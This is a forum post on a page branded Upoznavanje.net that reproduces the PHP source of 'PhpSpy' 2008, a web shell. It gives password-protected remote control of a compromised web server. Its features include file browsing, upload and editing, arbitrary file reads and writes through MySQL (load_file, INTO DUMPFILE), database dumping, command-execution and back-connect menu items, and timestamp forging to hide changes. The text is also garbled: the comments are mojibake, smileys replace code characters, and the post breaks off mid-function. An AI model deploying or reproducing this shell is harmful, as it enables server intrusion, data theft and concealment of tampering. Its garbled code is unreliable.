Registracija
Upoznavanje.net vam pomaže da se povežete sa drugim ljudima iz vašeg života.

Pregled samo jednog posta.
CWS RÞ

<?php

/****************************************************** ***********************

===================== ÇëÎóÓÃÓÚ·Ç·¨ÓÃ;£¬Ôì³ÉÒ»ÇĐºó¹ûÓë±¾ČËÎ޹ء£============= =======

·¢²¼´Ë°ć±¾ÊÇΪÁ˼ÍÄî°²Č«ÌìʹÔø¾­µÄ»Ô»Í¡£

¸ĐĐ»ÄãÃÇÓëÎÒһͬ×ß¹ý£ºSniper\Super¡¤Hei\kEvin1986\saiy\wofeiwo¡£

¸ĐĐ»ËùÓеÄÅóÓÑÃÇ¡¢ĐÖµÜÃÇ¡£¶àĐ»ÄãÃǵĹØĐĺÍÖ§³Ö£¡

Ñ¡ÔñÔÚ1ÔÂ7ČÕ·¢²¼ÊÇΪÁ˼ÍÄîÎÒÀÏĆŵÄÉúČÕ£¬Ô¤×£ÎÒÔÚ±¾ÃüÄêÀ ï¡£ÏÌÓã·­Éí£¡

====================== ×îºóԤף°²Č«ÌìʹµÄÿһλÅóÓÑ·É»ĆÌÚ´ï =======================

Codz by angel(4ngel)

Make in China

Web:

******************************************************* **********************/

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}

/*===================== ³ÌĐòÅäÖà =====================*/
$admin = array();
// ÊÇ·ñĐčÒªÃÜÂëÑéÖ¤, true ΪĐčÒªÑéÖ¤, false Ϊֱ½Ó½øČë.ÏÂÃćÑ¡ÏîÔòÎÞЧ
$admin['check'] = true;
// Čç¹ûĐčÒªÃÜÂëÑéÖ¤,ÇëĐ޸ĵǽÃÜÂë
$admin['pass'] = 'kolya';

//ČçÄú¶Ô cookie ×÷Ó÷¶Î§ÓĐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëĐÞ¸ÄÏÂÃć±äÁ¿, ·ñÔòÇë±£³ÖĬČÏ
// cookie ǰ׺
$admin['cookiepre'] = '';
// cookie ×÷ÓÃÓò
$admin['cookiedomain'] = '';
// cookie ×÷Ó÷¾¶
$admin['cookiepath'] = '/';
// cookie ÓĐЧĆÚ
$admin['cookielife'] = 86400;
/*===================== ÅäÖýáÊø =====================*/

if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8"Wink;
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5"Wink;
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk"Wink;
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2"Wink;
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Éí·ÝÑéÖ¤ =====================*/
if ($action == "logout"Wink {
scookie('phpspypass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ÑéÖ¤½áÊø =====================*/

$errmsg = '';

// ²é¿´PHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}

// ÏÂÔØÎļþ
if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}

// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
if ($doing == 'backupmysql' && !$saveasfile) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$table = array_flip($table);
$result = q("SHOW tables"Wink;
if (!$result) p(''.mysql_error().'');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}

// ͨ¹ýMYSQLÏÂÔØÎļþ
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q("select load_file('$mysqldlfile');"Wink;
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;"Wink;
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"Wink;
//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁČ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"Wink;
$result = q("select content from tmp_angel"Wink;
q("DROP TABLE tmp_angel"Wink;
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements;
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function $(id) {
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008<?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>Wink</td>
</tr>
<tr class="alt1">
<td>Safe Mode:<?php echo getcfg('safe_mode');?>
Logout |
File Manager |
MySQL Manager |
MySQL Upload & Download |
Execute Command |
PHP Variable |
Eval PHP Code
<?php if (!IS_WIN) {?> | Back Connect<?php }?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php

formhead(array('name'=>'goaction'));
makehide('action');
formfoot();

$errmsg && m($errmsg);

// »ñČ¡µ±Ç°Â·¾¶
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}
$uedir = ue($dir);

if (!$action || $action == 'file') {

// ÅĐ¶Ï¶ÁĐ´Çé¿ö
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

// ɾ³ýĿ¼
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
}
}

// ´´½¨Ä¿Â¼
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}

// ÉÏ´«Îļþ
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}

// ±à¼­Îļþ
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}

// ±à¼­ÎļþÊôĐÔ
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}

// ¸ÄÃû
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}

// ¸´ÖĆÎļþ
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}

// ¿Ë¡ʱ¼ä
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ×Ô¶¨Òåʱ¼ä
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second"Wink;
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ´ò°üÏÂÔØ
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}

// ÅúÁ¿É¾³ýÎļþ
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
}
}

//²Ù×÷Íê±Ï
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();

$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
p('File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)');

?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<form action="" method="post" id="godir" name="godir">
<tr>
<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>Wink</td>
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
<td nowrap><input class="bt" value="GO" type="submit"></td>
</tr>
</form>
</table>
<script type="text/javascript">
function createdir(){
var newdirname;
newdirname = prompt('Please input the directory name:', '');
if (!newdirname) return;
$('createdir').newdirname.value=newdirname;
$('createdir').submit();
}
function fileperm(pfile){
var newperm;
newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
if (!newperm) return;
$('fileperm').newperm.value=newperm;
$('fileperm').pfile.value=pfile;
$('fileperm').submit();
}
function copyfile(sname){
var tofile;
tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
if (!tofile) return;
$('copyfile').tofile.value=tofile;
$('copyfile').sname.value=sname;
$('copyfile').submit();
}
function rename(oldname){
var newfilename;
newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
if (!newfilename) return;
$('rename').newfilename.value=newfilename;
$('rename').oldname.value=oldname;
$('rename').submit();
}
function dofile(doing,thefile,m){
if (m && !confirm(m)) {
return;
}
$('filelist').doing.value=doing;
if (thefile){
$('filelist').thefile.value=thefile;
}
$('filelist').submit();
}
function createfile(nowpath){
var filename;
filename = prompt('Please input the file name:', '');
if (!filename) return;
opfile('editfile',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
$('fileopform').action.value=action;
$('fileopform').opfile.value=opfile;
$('fileopform').dir.value=dir;
$('fileopform').submit();
}
function godir(dir,view_writable){
if (view_writable) {
$('godir').view_writable.value=1;
}
$('godir').dir.value=dir;
$('godir').submit();
}
</script>
<?php
tbhead();
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
p('
<input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" />
');
p('WebRoot');
if ($view_writable) {
p(' | View All');
} else {
p(' | View Writable');
}
p(' | Create Directory | Create File');
if (IS_WIN && IS_COM) {
$obj = new COM('scripting.filesystemobject');
if ($obj && is_object($obj)) {
$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
foreach($obj->Drives as $drive) {
if ($drive->DriveType == 2) {
p(' | Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')');
} else {
p(' | Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')');
}
}
}
}

p('</td></tr></form>');

p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

//²é¿´ËùÓĐ¿ÉĐ´ÎļþºÍĿ¼
$dirdata=array();
$filedata=array();

if ($view_writable) {
$dirdata = GetList($nowpath);
} else {
// Ŀ¼Áбí
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath=$nowpath.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$dirdb['dirchmod']=getChmod($filepath);
$dirdb['dirperm']=getPerms($filepath);
$dirdb['fileowner']=getUser($filepath);
$dirdb['dirlink']=$nowpath;
$dirdb['server_link']=$filepath;
$dirdb['client_link']=ue($filepath);
$dirdata[]=$dirdb;
} else {
$filedb['filename']=$file;
$filedb['size']=sizecount(@filesize($filepath));
$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$filedb['filechmod']=getChmod($filepath);
$filedb['fileperm']=getPerms($filepath);
$filedb['fileowner']=getUser($filepath);
$filedb['dirlink']=$nowpath;
$filedb['server_link']=$filepath;
$filedb['client_link']=ue($filepath);
$filedata[]=$filedb;
}
}// while
unset($dirdb);
unset($filedb);
@closedir($dirs);
}
@sort($dirdata);
@sort($filedata);
$dir_i = '0';
foreach($dirdata as $key => $dirdb){
if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td width="2%" nowrap></td>');
p('<td>'.$dirdb['filename'].'</td>');
p('<td nowrap>'.$dirdb['mtime'].'</td>');
p('<td nowrap>--</td>');
p('<td nowrap>');
p(''.$dirdb['dirchmod'].' / ');
p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'</td>');
p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del | Rename</td>');
p('</tr>');
$dir_i++;
} else {
if($dirdb['filename']=='..') {
p('<tr class='.bg().'>');
p('<td align="center"><font face="Wingdings 3" size=4>=</td><td nowrap colspan="5">Parent Directory</td>');
p('</tr>');
}
}
}

p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
makehide('action','file');
makehide('thefile');
makehide('doing');
makehide('dir',$nowpath);
$file_i = '0';
foreach($filedata as $key => $filedb){
if($filedb['filename']!='..' && $filedb['filename']!='.') {
$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
p('<td>'.$filedb['filename'].'</td>');
p('<td nowrap>'.$filedb['mtime'].'</td>');
p('<td nowrap>'.$filedb['size'].'</td>');
p('<td nowrap>');
p(''.$filedb['filechmod'].' / ');
p(''.$filedb['fileperm'].''.$filedb['fileowner'].'</td>');
p('<td nowrap>');
p('Down | ');
p('Copy | ');
p('Edit | ');
p('Rename | ');
p('Time');
p('</td></tr>');
$file_i++;
}
}
p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td>Packing download selected - Delete selected</td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
p('</form></table>');
}// end dir

elseif ($action == 'sqlfile') {
if($doing=="mysqlupload"Wink{
$file = $_FILES['uploadfile'];
$filename = $file['tmp_name'];
if (file_exists($savepath)) {
m('The goal file has already existed');
} else {
if(!$filename) {
m('Please choose a file');
} else {
$fp=@fopen($filename,'r');
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents = bin2hex($contents);
if(!$upname) $upname = $file['name'];
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"Wink;
m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
}
}
}
?>
<script type="text/javascript">
function mysqlfile(doing){
if(!doing) return;
$('doing').value=doing;
$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
$('mysqlfile').charset.value=$('dbinfo').charset.value;
$('mysqlfile').submit();
}
</script>
<?php
!$dbhost && $dbhost = 'localhost';
!$dbuser && $dbuser = 'root';
!$dbport && $dbport = '3306';
$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
makehide('action','sqlfile');
p('

');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBName:');
makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
p('DBCharset:');
makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
p('

');
formfoot();
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
p('Upload file');
p('

This operation the DB user must has FILE privilege

');
p('

Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> Upload

');
p('Download file');
p('

File: <input class="input" name="mysqldlfile" size="115" type="text" /> Download

');
makehide('dbhost');
makehide('dbport');
makehide('dbuser');
makehide('dbpass');
makehide('dbname');
makehide('charset');
makehide('doing');
makehide('action','sqlfile');
p('</form>');
}

elseif ($action == 'sqladmin') {
!$dbhost && $dbhost = 'localhost';
!$dbuser && $dbuser = 'root';
!$dbport && $dbport = '3306';
$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
if(isset($dbhost)){
$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
}
if(isset($dbuser)) {
$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
}
if(isset($dbpass)) {
$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
}
if(isset($dbport)) {
$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
}
if(isset($dbname)) {
$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
}
if(isset($charset)) {
$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
}

if ($doing == 'backupmysql' && $saveasfile) {
if (!$table) {
m('Please choose the table');
} else {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$table = array_flip($table);
$fp = @fopen($path,'w');
if ($fp) {
$result = q('SHOW tables');
if (!$result) p(''.mysql_error().'');
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $fp);
}
}
fclose($fp);
$fileurl = str_replace(SA_ROOT,'',$path);
m('Database has success backup to '.$path.'');
mysql_close();
} else {
m('Backup failed');
}
}
}
if ($insert && $insertsql) {
$keystr = $valstr = $tmp = '';
foreach($insertsql as $key => $val) {
if ($val) {
$keystr .= $tmp.$key;
$valstr .= $tmp."'".addslashes($val)."'";
$tmp = ',';
}
}
if ($keystr && $valstr) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)"Wink ? 'Insert new record of success' : mysql_error());
}
}
if ($update && $insertsql && $base64) {
$valstr = $tmp = '';
foreach($insertsql as $key => $val) {
$valstr .= $tmp.$key."='".addslashes($val)."'";
$tmp = ',';
}
if ($valstr) {
$where = base64_decode($base64);
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1"Wink ? 'Record updating' : mysql_error());
}
}
if ($doing == 'del' && $base64) {
$where = base64_decode($base64);
$delete_sql = "DELETE FROM $tablename WHERE $where";
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("DELETE FROM $tablename WHERE $where"Wink ? 'Deletion record of success' : mysql_error());
}

if ($tablename && $doing == 'drop') {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (q("DROP TABLE $tablename"Wink) {
m('Drop table of success');
$tablename = '';
} else {
m(mysql_error());
}
}

$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');

formhead(array('title'=>'MYSQL Manager'));
makehide('action','sqladmin');
p('

');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBCharset:');
makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
p('

');
formfoot();
?>
<script type="text/javascript">
function editrecord(action, base64, tablename){
if (action == 'del') {
if (!confirm('Is or isn\'t deletion record?')) return;
}
$('recordlist').doing.value=action;
$('recordlist').base64.value=base64;
$('recordlist').tablename.value=tablename;
$('recordlist').submit();
}
function moddbname(dbname) {
if(!dbname) return;
$('setdbname').dbname.value=dbname;
$('setdbname').submit();
}
function settable(tablename,doing,page) {
if(!tablename) return;
if (doing) {
$('settable').doing.value=doing;
}
if (page) {
$('settable').page.value=page;
}
$('settable').tablename.value=tablename;
$('settable').submit();
}
</script>
<?php
//²Ù×÷¼Ç¼
formhead(array('name'=>'recordlist'));
makehide('doing');
makehide('action','sqladmin');
makehide('base64');
makehide('tablename');
p($dbform);
formfoot();

//Ñ¡¶¨Êý¾Ý¿â
formhead(array('name'=>'setdbname'));
makehide('action','sqladmin');
p($dbform);
if (!$dbname) {
makehide('dbname');
}
formfoot();

//Ñ¡¶¨±í
formhead(array('name'=>'settable'));
makehide('action','sqladmin');
p($dbform);
makehide('tablename');
makehide('page',$page);
makehide('doing');
formfoot();

$cachetables = array();
$pagenum = 30;
$page = intval($page);
if($page) {
$start_limit = ($page - 1) * $pagenum;
} else {
$start_limit = 0;
$page = 1;
}
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
//»ñČ¡Êý¾Ý¿âĐÅÏ¢
$mysqlver = mysql_get_server_info();
p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

');
$highver = $mysqlver > '4.1' ? 1 : 0;

//»ñČ¡Êý¾Ý¿â
$query = q("SHOW DATABASES"Wink;
$dbs = array();
$dbs[] = '-- Select a database --';
while($db = mysql_fetch_array($query)) {
$dbs[$db['Database']] = $db['Database'];
}
makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
$tabledb = array();
if ($dbname) {
p('

');
p('Current dababase: '.$dbname.'');
if ($tablename) {
p(' | Current Table: '.$tablename.' [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop ]');
}
p('

');
mysql_select_db($dbname);

$getnumsql = '';
$runquery = 0;
if ($sql_query) {
$runquery = 1;
}
$allowedit = 0;
if ($tablename && !$sql_query) {
$sql_query = "SELECT * FROM $tablename";
$getnumsql = $sql_query;
$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
$allowedit = 1;
}
p('<form action="'.$self.'" method="POST">');
p('

<table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table>

');
makehide('tablename', $tablename);
makehide('action','sqladmin');
p($dbform);
p('</form>');
if ($tablename || ($runquery && $sql_query)) {
if ($doing == 'structure') {
$result = q("SHOW COLUMNS FROM $tablename"Wink;
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
